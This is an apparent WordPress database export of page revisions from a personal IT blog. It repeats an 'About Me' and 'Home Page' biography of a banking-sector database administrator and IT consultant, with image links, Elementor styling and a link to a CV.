(792,2,'2024-04-14 10:44:20','2024-04-14 10:44:20','<!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:44:20','2024-04-14 10:44:20','',51,'https://ictbank.ir/blog/?p=792',0,'revision','',0),
(793,2,'2024-04-14 10:44:20','2024-04-14 10:44:20','<!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:44:20','2024-04-14 10:44:20','',51,'https://ictbank.ir/blog/?p=793',0,'revision','',0),
(794,2,'2024-04-14 10:44:20','2024-04-14 10:44:20','<style>/*! elementor - v3.20.0 - 10-04-2024 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:44:20','2024-04-14 10:44:20','',51,'https://ictbank.ir/blog/?p=794',0,'revision','',0),
(795,2,'2024-04-14 10:47:34','2024-04-14 10:47:34','<style>/*! elementor - v3.20.0 - 10-04-2024 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:47:34','2024-04-14 10:47:34','',51,'https://ictbank.ir/blog/?p=795',0,'revision','',0),
(796,2,'2024-04-14 10:47:34','2024-04-14 10:47:34','<style>/*! elementor - v3.20.0 - 10-04-2024 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:47:34','2024-04-14 10:47:34','',51,'https://ictbank.ir/blog/?p=796',0,'revision','',0),
(797,2,'2024-04-14 10:47:34','2024-04-14 10:47:34','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:47:34','2024-04-14 10:47:34','',51,'https://ictbank.ir/blog/?p=797',0,'revision','',0),
(798,2,'2024-04-14 10:47:46','2024-04-14 10:47:46','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:47:46','2024-04-14 10:47:46','',51,'https://ictbank.ir/blog/?p=798',0,'revision','',0),
(799,2,'2024-04-14 10:47:46','2024-04-14 10:47:46','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:47:46','2024-04-14 10:47:46','',51,'https://ictbank.ir/blog/?p=799',0,'revision','',0),
(800,2,'2024-04-14 10:47:46','2024-04-14 10:47:46','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:47:46','2024-04-14 10:47:46','',51,'https://ictbank.ir/blog/?p=800',0,'revision','',0),
(801,2,'2024-04-14 10:48:14','2024-04-14 10:48:14','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:48:14','2024-04-14 10:48:14','',51,'https://ictbank.ir/blog/?p=801',0,'revision','',0),
(802,2,'2024-04-14 10:48:14','2024-04-14 10:48:14','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:48:14','2024-04-14 10:48:14','',51,'https://ictbank.ir/blog/?p=802',0,'revision','',0),
(803,2,'2024-04-14 10:48:14','2024-04-14 10:48:14','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:48:14','2024-04-14 10:48:14','',51,'https://ictbank.ir/blog/?p=803',0,'revision','',0),
(804,2,'2024-04-14 10:49:45','2024-04-14 10:49:45','','CV - DBA','','inherit','open','closed','','cv-dba','','','2024-04-14 10:49:45','2024-04-14 10:49:45','',0,'http://ictbank.ir/blog/wp-content/uploads/2024/04/CV-DBA.pdf',0,'attachment','application/pdf',0),
(805,2,'2024-04-14 10:50:00','2024-04-14 10:50:00','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:50:00','2024-04-14 10:50:00','',51,'https://ictbank.ir/blog/?p=805',0,'revision','',0),
(806,2,'2024-04-14 10:50:01','2024-04-14 10:50:01','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:50:01','2024-04-14 10:50:01','',51,'https://ictbank.ir/blog/?p=806',0,'revision','',0),
(807,2,'2024-04-14 10:50:01','2024-04-14 10:50:01','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --> \n <style>/*! elementor - v3.20.0 - 10-04-2024 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2><a href=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/CV-DBA.pdf\">My Resume</a></h2>','About Me','','inherit','closed','closed','','51-revision-v1','','','2024-04-14 10:50:01','2024-04-14 10:50:01','',51,'https://ictbank.ir/blog/?p=807',0,'revision','',0),
(833,1,'2025-08-16 10:27:13','2025-08-16 10:27:13','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-08-16 10:27:13','2025-08-16 10:27:13','',647,'https://ictbank.ir/blog/?p=833',0,'revision','',0),
(834,1,'2025-08-16 10:27:13','2025-08-16 10:27:13','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-08-16 10:27:13','2025-08-16 10:27:13','',647,'https://ictbank.ir/blog/?p=834',0,'revision','',0),
(835,1,'2025-08-16 10:27:13','2025-08-16 10:27:13','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-08-16 10:27:13','2025-08-16 10:27:13','',647,'https://ictbank.ir/blog/?p=835',0,'revision','',0),
(838,1,'2025-09-19 06:50:01','2025-09-19 06:50:01','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-19 06:50:01','2025-09-19 06:50:01','',647,'https://ictbank.ir/blog/?p=838',0,'revision','',0),
(839,1,'2025-09-19 06:50:02','2025-09-19 06:50:02','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> <a href=\"http://ictbank.ir/blog/category/database/\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img src=\"http://ictbank.ir/blog_new/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-19 06:50:02','2025-09-19 06:50:02','',647,'https://ictbank.ir/blog/?p=839',0,'revision','',0),
(840,1,'2025-09-19 06:50:02','2025-09-19 06:50:02','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-19 06:50:02','2025-09-19 06:50:02','',647,'https://ictbank.ir/blog/?p=840',0,'revision','',0),
(842,1,'2025-09-20 16:29:44','2025-09-20 16:29:44','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2025-09-20 16:29:44','2025-09-20 16:29:44','',345,'https://ictbank.ir/blog/?p=842',0,'revision','',0),
(843,1,'2025-09-23 04:45:38','2025-09-23 04:45:38','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 04:45:38','2025-09-23 04:45:38','',647,'https://ictbank.ir/blog/?p=843',0,'revision','',0),
(844,1,'2025-09-23 04:45:39','2025-09-23 04:45:39','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 04:45:39','2025-09-23 04:45:39','',647,'https://ictbank.ir/blog/?p=844',0,'revision','',0),
(845,1,'2025-09-23 04:45:39','2025-09-23 04:45:39','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 04:45:39','2025-09-23 04:45:39','',647,'https://ictbank.ir/blog/?p=845',0,'revision','',0),
(846,1,'2025-09-23 04:46:17','2025-09-23 04:46:17','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 04:46:17','2025-09-23 04:46:17','',647,'https://ictbank.ir/blog/?p=846',0,'revision','',0),
